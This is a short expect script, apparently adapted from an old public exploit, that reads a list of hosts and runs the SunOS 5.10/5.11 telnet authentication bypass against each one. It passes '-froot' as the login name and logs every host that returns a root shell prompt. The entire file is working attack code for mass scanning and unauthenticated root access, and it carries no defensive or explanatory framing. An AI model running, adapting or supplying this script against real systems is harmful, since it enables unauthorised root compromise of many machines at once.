#!/usr/bin/expect -f
# reference : http://milw0rm.com/exploits/3293
# Kingcope has created an exploit for single host using sh scripting
# Code by Someone /at/ kandangjamur.net
# SunOS 5.10/5.11 sparch remote telnet auth bypass
# An exploit for massive host, coded using expect
#

set timeout 10
set host [lindex $argv 0]

if {[llength $argv] != 1} {
   puts stderr "Usage: $argv0 <hosts-file>\n"
   exit
}

set tryHost [open $host r]
set hosts [read $tryHost]

foreach ip $hosts {
   spawn telnet -l "-froot" $ip
   set logVuln [open vulnerable.log a]
   expect "#" {
    puts $logVuln "[root] Vulnerable SunOS : $ip\n"
    close $logVuln
   }
}